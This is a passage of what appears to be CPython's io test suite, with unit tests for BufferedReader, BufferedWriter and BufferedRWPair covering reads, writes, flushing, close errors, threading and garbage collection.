pyio.RawIOBase) self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods') class CommonBufferedTests: # Tests common to BufferedReader, BufferedWriter and BufferedRandom def test_detach(self): raw = self.MockRawIO() buf = self.tp(raw) self.assertIs(buf.detach(), raw) self.assertRaises(ValueError, buf.detach) repr(buf) # Should still work def test_fileno(self): rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertEqual(42, bufio.fileno()) def test_invalid_args(self): rawio = self.MockRawIO() bufio = self.tp(rawio) # Invalid whence self.assertRaises(ValueError, bufio.seek, 0, -1) self.assertRaises(ValueError, bufio.seek, 0, 9) def test_override_destructor(self): tp = self.tp record = [] class MyBufferedIO(tp): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() rawio = self.MockRawIO() bufio = MyBufferedIO(rawio) del bufio support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_context_manager(self): # Test usability as a context manager rawio = self.MockRawIO() bufio = self.tp(rawio) def _with(): with bufio: pass _with() # bufio should now be closed, and using it a second time should raise # a ValueError. self.assertRaises(ValueError, _with) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.tp(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) def test_repr(self): raw = self.MockRawIO() b = self.tp(raw) clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__) self.assertRegex(repr(b), "<%s>" % clsname) raw.name = "dummy" self.assertRegex(repr(b), "<%s name='dummy'>" % clsname) raw.name = b"dummy" self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname) def test_recursive_repr(self): # Issue #25455 raw = self.MockRawIO() b = self.tp(raw) with support.swap_attr(raw, 'name', b): try: repr(b) # Should not crash except RuntimeError: pass def test_flush_error_on_close(self): # Test that buffered file is closed despite failed flush # and that flush() is called before file closed. raw = self.MockRawIO() closed = [] def bad_flush(): closed[:] = [b.closed, raw.closed] raise OSError() raw.flush = bad_flush b = self.tp(raw) self.assertRaises(OSError, b.close) # exception not swallowed self.assertTrue(b.closed) self.assertTrue(raw.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed self.assertFalse(closed[1]) raw.flush = lambda: None # break reference loop def test_close_error_on_close(self): raw = self.MockRawIO() def bad_flush(): raise OSError('flush') def bad_close(): raise OSError('close') raw.close = bad_close b = self.tp(raw) b.flush = bad_flush with self.assertRaises(OSError) as err: # exception not swallowed b.close() self.assertEqual(err.exception.args, ('close',)) self.assertIsInstance(err.exception.__context__, OSError) self.assertEqual(err.exception.__context__.args, ('flush',)) self.assertFalse(b.closed) # Silence destructor error raw.close = lambda: None b.flush = lambda: None def test_nonnormalized_close_error_on_close(self): # Issue #21677 raw = self.MockRawIO() def bad_flush(): raise non_existing_flush def bad_close(): raise non_existing_close raw.close = bad_close b = self.tp(raw) b.flush = bad_flush with self.assertRaises(NameError) as err: # exception not swallowed b.close() self.assertIn('non_existing_close', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) self.assertIn('non_existing_flush', str(err.exception.__context__)) self.assertFalse(b.closed) # Silence destructor error b.flush = lambda: None raw.close = lambda: None def test_multi_close(self): raw = self.MockRawIO() b = self.tp(raw) b.close() b.close() b.close() self.assertRaises(ValueError, b.flush) def test_unseekable(self): bufio = self.tp(self.MockUnseekableIO(b"A" * 10)) self.assertRaises(self.UnsupportedOperation, bufio.tell) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) def test_readonly_attributes(self): raw = self.MockRawIO() buf = self.tp(raw) x = self.MockRawIO() with self.assertRaises(AttributeError): buf.raw = x class SizeofTest: @support.cpython_only def test_sizeof(self): bufsize1 = 4096 bufsize2 = 8192 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize1) size = sys.getsizeof(bufio) - bufsize1 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize2) self.assertEqual(sys.getsizeof(bufio), size + bufsize2) @support.cpython_only def test_buffer_freeing(self) : bufsize = 4096 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize) size = sys.getsizeof(bufio) - bufsize bufio.close() self.assertEqual(sys.getsizeof(bufio), size) class BufferedReaderTest(unittest.TestCase, CommonBufferedTests): read_mode = "rb" def test_constructor(self): rawio = self.MockRawIO([b"abc"]) bufio = self.tp(rawio) bufio.__init__(rawio) bufio.__init__(rawio, buffer_size=1024) bufio.__init__(rawio, buffer_size=16) self.assertEqual(b"abc", bufio.read()) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) rawio = self.MockRawIO([b"abc"]) bufio.__init__(rawio) self.assertEqual(b"abc", bufio.read()) def test_uninitialized(self): bufio = self.tp.__new__(self.tp) del bufio bufio = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', bufio.read, 0) bufio.__init__(self.MockRawIO()) self.assertEqual(bufio.read(0), b'') def test_read(self): for arg in (None, 7): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read(arg)) # Invalid args self.assertRaises(ValueError, bufio.read, -2) def test_read1(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"a", bufio.read(1)) self.assertEqual(b"b", bufio.read1(1)) self.assertEqual(rawio._reads, 1) self.assertEqual(b"", bufio.read1(0)) self.assertEqual(b"c", bufio.read1(100)) self.assertEqual(rawio._reads, 1) self.assertEqual(b"d", bufio.read1(100)) self.assertEqual(rawio._reads, 2) self.assertEqual(b"efg", bufio.read1(100)) self.assertEqual(rawio._reads, 3) self.assertEqual(b"", bufio.read1(100)) self.assertEqual(rawio._reads, 4) def test_read1_arbitrary(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"a", bufio.read(1)) self.assertEqual(b"bc", bufio.read1()) self.assertEqual(b"d", bufio.read1()) self.assertEqual(b"efg", bufio.read1(-1)) self.assertEqual(rawio._reads, 3) self.assertEqual(b"", bufio.read1()) self.assertEqual(rawio._reads, 4) def test_readinto(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) b = bytearray(2) self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ab") self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"cd") self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ef") self.assertEqual(bufio.readinto(b), 1) self.assertEqual(b, b"gf") self.assertEqual(bufio.readinto(b), 0) self.assertEqual(b, b"gf") rawio = self.MockRawIO((b"abc", None)) bufio = self.tp(rawio) self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ab") self.assertEqual(bufio.readinto(b), 1) self.assertEqual(b, b"cb") def test_readinto1(self): buffer_size = 10 rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl")) bufio = self.tp(rawio, buffer_size=buffer_size) b = bytearray(2) self.assertEqual(bufio.peek(3), b'abc') self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 2) self.assertEqual(b, b"ab") self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 1) self.assertEqual(b[:1], b"c") self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 2) self.assertEqual(b, b"de") self.assertEqual(rawio._reads, 2) b = bytearray(2*buffer_size) self.assertEqual(bufio.peek(3), b'fgh') self.assertEqual(rawio._reads, 3) self.assertEqual(bufio.readinto1(b), 6) self.assertEqual(b[:6], b"fghjkl") self.assertEqual(rawio._reads, 4) def test_readinto_array(self): buffer_size = 60 data = b"a" * 26 rawio = self.MockRawIO((data,)) bufio = self.tp(rawio, buffer_size=buffer_size) # Create an array with element size > 1 byte b = array.array('i', b'x' * 32) assert len(b) != 16 # Read into it. We should get as many *bytes* as we can fit into b # (which is more than the number of elements) n = bufio.readinto(b) self.assertGreater(n, len(b)) # Check that old contents of b are preserved bm = memoryview(b).cast('B') self.assertLess(n, len(bm)) self.assertEqual(bm[:n], data[:n]) self.assertEqual(bm[n:], b'x' * (len(bm[n:]))) def test_readinto1_array(self): buffer_size = 60 data = b"a" * 26 rawio = self.MockRawIO((data,)) bufio = self.tp(rawio, buffer_size=buffer_size) # Create an array with element size > 1 byte b = array.array('i', b'x' * 32) assert len(b) != 16 # Read into it. We should get as many *bytes* as we can fit into b # (which is more than the number of elements) n = bufio.readinto1(b) self.assertGreater(n, len(b)) # Check that old contents of b are preserved bm = memoryview(b).cast('B') self.assertLess(n, len(bm)) self.assertEqual(bm[:n], data[:n]) self.assertEqual(bm[n:], b'x' * (len(bm[n:]))) def test_readlines(self): def bufio(): rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef")) return self.tp(rawio) self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"]) self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"]) self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"]) def test_buffering(self): data = b"abcdefghi" dlen = len(data) tests = [ [ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ], [ 100, [ 3, 3, 3], [ dlen ] ], [ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ], ] for bufsize, buf_read_sizes, raw_read_sizes in tests: rawio = self.MockFileIO(data) bufio = self.tp(rawio, buffer_size=bufsize) pos = 0 for nbytes in buf_read_sizes: self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes]) pos += nbytes # this is mildly implementation-dependent self.assertEqual(rawio.read_history, raw_read_sizes) def test_read_non_blocking(self): # Inject some None's in there to simulate EWOULDBLOCK rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None)) bufio = self.tp(rawio) self.assertEqual(b"abcd", bufio.read(6)) self.assertEqual(b"e", bufio.read(1)) self.assertEqual(b"fg", bufio.read()) self.assertEqual(b"", bufio.peek(1)) self.assertIsNone(bufio.read()) self.assertEqual(b"", bufio.read()) rawio = self.MockRawIO((b"a", None, None)) self.assertEqual(b"a", rawio.readall()) self.assertIsNone(rawio.readall()) def test_read_past_eof(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read(9000)) def test_read_all(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read()) @support.requires_resource('cpu') def test_threads(self): try: # Write out many bytes with exactly the same number of 0's, # 1's... 255's. This will help us check that concurrent reading # doesn't duplicate or forget contents. N = 1000 l = list(range(256)) * N random.shuffle(l) s = bytes(bytearray(l)) with self.open(os_helper.TESTFN, "wb") as f: f.write(s) with self.open(os_helper.TESTFN, self.read_mode, buffering=0) as raw: bufio = self.tp(raw, 8) errors = [] results = [] def f(): try: # Intra-buffer read then buffer-flushing read for n in cycle([1, 19]): s = bufio.read(n) if not s: break # list.append() is atomic results.append(s) except Exception as e: errors.append(e) raise threads = [threading.Thread(target=f) for x in range(20)] with threading_helper.start_threads(threads): time.sleep(0.02) # yield self.assertFalse(errors, "the following exceptions were caught: %r" % errors) s = b''.join(results) for i in range(256): c = bytes(bytearray([i])) self.assertEqual(s.count(c), N) finally: os_helper.unlink(os_helper.TESTFN) def test_unseekable(self): bufio = self.tp(self.MockUnseekableIO(b"A" * 10)) self.assertRaises(self.UnsupportedOperation, bufio.tell) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) bufio.read(1) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) self.assertRaises(self.UnsupportedOperation, bufio.tell) def test_misbehaved_io(self): rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertRaises(OSError, bufio.seek, 0) self.assertRaises(OSError, bufio.tell) # Silence destructor error bufio.close = lambda: None def test_no_extraneous_read(self): # Issue #9550; when the raw IO object has satisfied the read request, # we should not issue any additional reads, otherwise it may block # (e.g. socket). bufsize = 16 for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2): rawio = self.MockRawIO([b"x" * n]) bufio = self.tp(rawio, bufsize) self.assertEqual(bufio.read(n), b"x" * n) # Simple case: one raw read is enough to satisfy the request. self.assertEqual(rawio._extraneous_reads, 0, "failed for {}: {} != 0".format(n, rawio._extraneous_reads)) # A more complex case where two raw reads are needed to satisfy # the request. rawio = self.MockRawIO([b"x" * (n - 1), b"x"]) bufio = self.tp(rawio, bufsize) self.assertEqual(bufio.read(n), b"x" * n) self.assertEqual(rawio._extraneous_reads, 0, "failed for {}: {} != 0".format(n, rawio._extraneous_reads)) def test_read_on_closed(self): # Issue #23796 b = io.BufferedReader(io.BytesIO(b"12")) b.read(1) b.close() self.assertRaises(ValueError, b.peek) self.assertRaises(ValueError, b.read1, 1) def test_truncate_on_read_only(self): rawio = self.MockFileIO(b"abc") bufio = self.tp(rawio) self.assertFalse(bufio.writable()) self.assertRaises(self.UnsupportedOperation, bufio.truncate) self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0) class CBufferedReaderTest(BufferedReaderTest, SizeofTest): tp = io.BufferedReader @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedReaderTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_initialization(self): rawio = self.MockRawIO([b"abc"]) bufio = self.tp(rawio) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.read) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.read) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) self.assertRaises(ValueError, bufio.read) def test_misbehaved_io_read(self): rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) # _pyio.BufferedReader seems to implement reading different, so that # checking this is not so easy. self.assertRaises(OSError, bufio.read, 10) def test_garbage_collection(self): # C BufferedReader objects are collected. # The Python version has __del__, so it ends into gc.garbage instead self.addCleanup(os_helper.unlink, os_helper.TESTFN) with warnings_helper.check_warnings(('', ResourceWarning)): rawio = self.FileIO(os_helper.TESTFN, "w+b") f = self.tp(rawio) f.f = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedReader"): self.tp(io.BytesIO(), 1024, 1024, 1024) def test_bad_readinto_value(self): rawio = io.BufferedReader(io.BytesIO(b"12")) rawio.readinto = lambda buf: -1 bufio = self.tp(rawio) with self.assertRaises(OSError) as cm: bufio.readline() self.assertIsNone(cm.exception.__cause__) def test_bad_readinto_type(self): rawio = io.BufferedReader(io.BytesIO(b"12")) rawio.readinto = lambda buf: b'' bufio = self.tp(rawio) with self.assertRaises(OSError) as cm: bufio.readline() self.assertIsInstance(cm.exception.__cause__, TypeError) class PyBufferedReaderTest(BufferedReaderTest): tp = pyio.BufferedReader class BufferedWriterTest(unittest.TestCase, CommonBufferedTests): write_mode = "wb" def test_constructor(self): rawio = self.MockRawIO() bufio = self.tp(rawio) bufio.__init__(rawio) bufio.__init__(rawio, buffer_size=1024) bufio.__init__(rawio, buffer_size=16) self.assertEqual(3, bufio.write(b"abc")) bufio.flush() self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) bufio.__init__(rawio) self.assertEqual(3, bufio.write(b"ghi")) bufio.flush() self.assertEqual(b"".join(rawio._write_stack), b"abcghi") def test_uninitialized(self): bufio = self.tp.__new__(self.tp) del bufio bufio = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', bufio.write, b'') bufio.__init__(self.MockRawIO()) self.assertEqual(bufio.write(b''), 0) def test_detach_flush(self): raw = self.MockRawIO() buf = self.tp(raw) buf.write(b"howdy!") self.assertFalse(raw._write_stack) buf.detach() self.assertEqual(raw._write_stack, [b"howdy!"]) def test_write(self): # Write to the buffered IO but don't overflow the buffer. writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") self.assertFalse(writer._write_stack) buffer = bytearray(b"def") bufio.write(buffer) buffer[:] = b"***" # Overwrite our copy of the data bufio.flush() self.assertEqual(b"".join(writer._write_stack), b"abcdef") def test_write_overflow(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) contents = b"abcdefghijklmnop" for n in range(0, len(contents), 3): bufio.write(contents[n:n+3]) flushed = b"".join(writer._write_stack) # At least (total - 8) bytes were implicitly flushed, perhaps more # depending on the implementation. self.assertTrue(flushed.startswith(contents[:-8]), flushed) def check_writes(self, intermediate_func): # Lots of writes, test the flushed output is as expected. contents = bytes(range(256)) * 1000 n = 0 writer = self.MockRawIO() bufio = self.tp(writer, 13) # Generator of write sizes: repeat each N 15 times then proceed to N+1 def gen_sizes(): for size in count(1): for i in range(15): yield size sizes = gen_sizes() while n < len(contents): size = min(next(sizes), len(contents) - n) self.assertEqual(bufio.write(contents[n:n+size]), size) intermediate_func(bufio) n += size bufio.flush() self.assertEqual(contents, b"".join(writer._write_stack)) def test_writes(self): self.check_writes(lambda bufio: None) def test_writes_and_flushes(self): self.check_writes(lambda bufio: bufio.flush()) def test_writes_and_seeks(self): def _seekabs(bufio): pos = bufio.tell() bufio.seek(pos + 1, 0) bufio.seek(pos - 1, 0) bufio.seek(pos, 0) self.check_writes(_seekabs) def _seekrel(bufio): pos = bufio.seek(0, 1) bufio.seek(+1, 1) bufio.seek(-1, 1) bufio.seek(pos, 0) self.check_writes(_seekrel) def test_writes_and_truncates(self): self.check_writes(lambda bufio: bufio.truncate(bufio.tell())) def test_write_non_blocking(self): raw = self.MockNonBlockWriterIO() bufio = self.tp(raw, 8) self.assertEqual(bufio.write(b"abcd"), 4) self.assertEqual(bufio.write(b"efghi"), 5) # 1 byte will be written, the rest will be buffered raw.block_on(b"k") self.assertEqual(bufio.write(b"jklmn"), 5) # 8 bytes will be written, 8 will be buffered and the rest will be lost raw.block_on(b"0") try: bufio.write(b"opqrwxyz0123456789") except self.BlockingIOError as e: written = e.characters_written else: self.fail("BlockingIOError should have been raised") self.assertEqual(written, 16) self.assertEqual(raw.pop_written(), b"abcdefghijklmnopqrwxyz") self.assertEqual(bufio.write(b"ABCDEFGHI"), 9) s = raw.pop_written() # Previously buffered bytes were flushed self.assertTrue(s.startswith(b"01234567A"), s) def test_write_and_rewind(self): raw = io.BytesIO() bufio = self.tp(raw, 4) self.assertEqual(bufio.write(b"abcdef"), 6) self.assertEqual(bufio.tell(), 6) bufio.seek(0, 0) self.assertEqual(bufio.write(b"XY"), 2) bufio.seek(6, 0) self.assertEqual(raw.getvalue(), b"XYcdef") self.assertEqual(bufio.write(b"123456"), 6) bufio.flush() self.assertEqual(raw.getvalue(), b"XYcdef123456") def test_flush(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") bufio.flush() self.assertEqual(b"abc", writer._write_stack[0]) def test_writelines(self): l = [b'ab', b'cd', b'ef'] writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.writelines(l) bufio.flush() self.assertEqual(b''.join(writer._write_stack), b'abcdef') def test_writelines_userlist(self): l = UserList([b'ab', b'cd', b'ef']) writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.writelines(l) bufio.flush() self.assertEqual(b''.join(writer._write_stack), b'abcdef') def test_writelines_error(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) self.assertRaises(TypeError, bufio.writelines, [1, 2, 3]) self.assertRaises(TypeError, bufio.writelines, None) self.assertRaises(TypeError, bufio.writelines, 'abc') def test_destructor(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") del bufio support.gc_collect() self.assertEqual(b"abc", writer._write_stack[0]) def test_truncate(self): # Truncate implicitly flushes the buffer. self.addCleanup(os_helper.unlink, os_helper.TESTFN) with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw: bufio = self.tp(raw, 8) bufio.write(b"abcdef") self.assertEqual(bufio.truncate(3), 3) self.assertEqual(bufio.tell(), 6) with self.open(os_helper.TESTFN, "rb", buffering=0) as f: self.assertEqual(f.read(), b"abc") def test_truncate_after_write(self): # Ensure that truncate preserves the file position after # writes longer than the buffer size. # Issue: https://bugs.python.org/issue32228 self.addCleanup(os_helper.unlink, os_helper.TESTFN) with self.open(os_helper.TESTFN, "wb") as f: # Fill with some buffer f.write(b'\x00' * 10000) buffer_sizes = [8192, 4096, 200] for buffer_size in buffer_sizes: with self.open(os_helper.TESTFN, "r+b", buffering=buffer_size) as f: f.write(b'\x00' * (buffer_size + 1)) # After write write_pos and write_end are set to 0 f.read(1) # read operation makes sure that pos != raw_pos f.truncate() self.assertEqual(f.tell(), buffer_size + 2) @support.requires_resource('cpu') def test_threads(self): try: # Write out many bytes from many threads and test they were # all flushed. N = 1000 contents = bytes(range(256)) * N sizes = cycle([1, 19]) n = 0 queue = deque() while n < len(contents): size = next(sizes) queue.append(contents[n:n+size]) n += size del contents # We use a real file object because it allows us to # exercise situations where the GIL is released before # writing the buffer to the raw streams. This is in addition # to concurrency issues due to switching threads in the middle # of Python code. with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw: bufio = self.tp(raw, 8) errors = [] def f(): try: while True: try: s = queue.popleft() except IndexError: return bufio.write(s) except Exception as e: errors.append(e) raise threads = [threading.Thread(target=f) for x in range(20)] with threading_helper.start_threads(threads): time.sleep(0.02) # yield self.assertFalse(errors, "the following exceptions were caught: %r" % errors) bufio.close() with self.open(os_helper.TESTFN, "rb") as f: s = f.read() for i in range(256): self.assertEqual(s.count(bytes([i])), N) finally: os_helper.unlink(os_helper.TESTFN) def test_misbehaved_io(self): rawio = self.MisbehavedRawIO() bufio = self.tp(rawio, 5) self.assertRaises(OSError, bufio.seek, 0) self.assertRaises(OSError, bufio.tell) self.assertRaises(OSError, bufio.write, b"abcdef") # Silence destructor error bufio.close = lambda: None def test_max_buffer_size_removal(self): with self.assertRaises(TypeError): self.tp(self.MockRawIO(), 8, 12) def test_write_error_on_close(self): raw = self.MockRawIO() def bad_write(b): raise OSError() raw.write = bad_write b = self.tp(raw) b.write(b'spam') self.assertRaises(OSError, b.close) # exception not swallowed self.assertTrue(b.closed) def test_slow_close_from_thread(self): # Issue #31976 rawio = self.SlowFlushRawIO() bufio = self.tp(rawio, 8) t = threading.Thread(target=bufio.close) t.start() rawio.in_flush.wait() self.assertRaises(ValueError, bufio.write, b'spam') self.assertTrue(bufio.closed) t.join() class CBufferedWriterTest(BufferedWriterTest, SizeofTest): tp = io.BufferedWriter @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedWriterTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_initialization(self): rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.write, b"def") self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.write, b"def") self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) self.assertRaises(ValueError, bufio.write, b"def") def test_garbage_collection(self): # C BufferedWriter objects are collected, and collecting them flushes # all data to disk. # The Python version has __del__, so it ends into gc.garbage instead self.addCleanup(os_helper.unlink, os_helper.TESTFN) with warnings_helper.check_warnings(('', ResourceWarning)): rawio = self.FileIO(os_helper.TESTFN, "w+b") f = self.tp(rawio) f.write(b"123xxx") f.x = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"123xxx") def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedWriter"): self.tp(io.BytesIO(), 1024, 1024, 1024) class PyBufferedWriterTest(BufferedWriterTest): tp = pyio.BufferedWriter class BufferedRWPairTest(unittest.TestCase): def test_constructor(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertFalse(pair.closed) def test_uninitialized(self): pair = self.tp.__new__(self.tp) del pair pair = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', pair.read, 0) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', pair.write, b'') pair.__init__(self.MockRawIO(), self.MockRawIO()) self.assertEqual(pair.read(0), b'') self.assertEqual(pair.write(b''), 0) def test_detach(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertRaises(self.UnsupportedOperation, pair.detach) def test_constructor_max_buffer_size_removal(self): with self.assertRaises(TypeError): self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12) def test_constructor_with_not_readable(self): class NotReadable(MockRawIO): def readable(self): return False self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO()) def test_constructor_with_not_writeable(self): class NotWriteable(MockRawIO): def writable(self): return False self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable()) def test_read(self): pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) self.assertEqual(pair.read(3), b"abc") self.assertEqual(pair.read(1), b"d") self.assertEqual(pair.read(), b"ef") pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO()) self.assertEqual(pair.read(None), b"abc") def test_readlines(self): pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO()) self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"]) self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"]) self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"]) def test_read1(self): # .read1() is delegated to the underlying reader object, so this test # can be shallow. pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) self.assertEqual(pair.read1(3), b"abc") self.assertEqual(pair.read1(), b"def") def test_readinto(self): for method in ("readinto", "readinto1"): with self.subTest(method): pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) data = byteslike(b'\0' * 5) self.assertEqual(getattr(pair, method)(data), 5) self.assertEqual(bytes(data), b"abcde") def test_write(self): w = self.MockRawIO() pair = self.tp(self.MockRawIO(), w) pair.write(b"abc") pair.flush() buffer = bytearray(b"def") pair.write(buffer) buffer[:] = b"***" # Overwrite our copy of the data pair.flush() self.assertEqual(w._write_stack, [b"abc", b"def"]) def test_peek(self): pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) self.assertTrue(pair.peek(3).startswith(b"abc")) self.assertEqual(pair.read(3), b"abc") def test_readable(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertTrue(pair.readable()) def test_writeable(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertTrue(pair.writable()) def test_seekable(self): # BufferedRWPairs are never seekable, even if their readers and writers # are. pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertFalse(pair.seekable()) # .flush() is delegated to the underlying writer object and has been # tested in the test_write method. def test_close_and_closed(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertFalse(pair.closed) pair.close() self.assertTrue(pair.closed) def test_reader_close_error_on_close(self): def reader_close(): reader_non_existing reader = self.MockRawIO() reader.close = reader_close writer = self.MockRawIO() pair = self.tp(reader, writer) with self.assertRaises(NameError) as err: pair.close() self.assertIn('reader_non_existing', str(err.exception)) self.assertTrue(pair.closed) self.assertFalse(reader.closed) self.assertTrue(writer.closed) # Silence destructor error reader.close = lambda: None def test_writer_close_error_on_close(self): def writer_close(): writer_non_existing reader = self.MockRawIO() writer = self.MockRawIO() writer.close = writer_close pair = self.tp(reader, writer) with self.assertRaises(NameError) as err: pair.close() self.assertIn('writer_non_existing', str(err.exception)) self.assertFalse(pair.closed) self.assertTrue(reader.closed) self.assertFalse(writer.closed) # Silence destructor error writer.close = lambda: None writer = None # Ignore BufferedWriter (of the BufferedRWPair) unraisable exception with support.catch_unraisable_exception(): # Ignore BufferedRWPair unraisable exception with support.catch_unraisable_exception(): pair = None support.gc_collect() support.gc_collect() def test_reader_writer_close_error_on_close(self): def reader_close(): reader_non_existing def writer_close(): writer_non_existing reader = self.MockRawIO() reader.close = reader_close writer = self.MockRawIO() writer.close = writer_close pair = self.tp(reader, writer) with self.assertRaises(NameError) as err: pair.close() self.assertIn('reader_non_existing', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) self.assertIn('writer_non_existing', str(err.exception.__context__)) self.assertFalse(pair.closed) self.assertFalse(reader.closed) self.assertFalse(writer.closed) # Silence destructor error reader.close = lambda: None writer.close = lambda: None def test_isatty(self): class SelectableIsAtty(MockRawIO): def __init__(self, isatty): MockRawIO.__init__(self) self._isatty = isatty def isatty(self): return self._isatty pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False)) 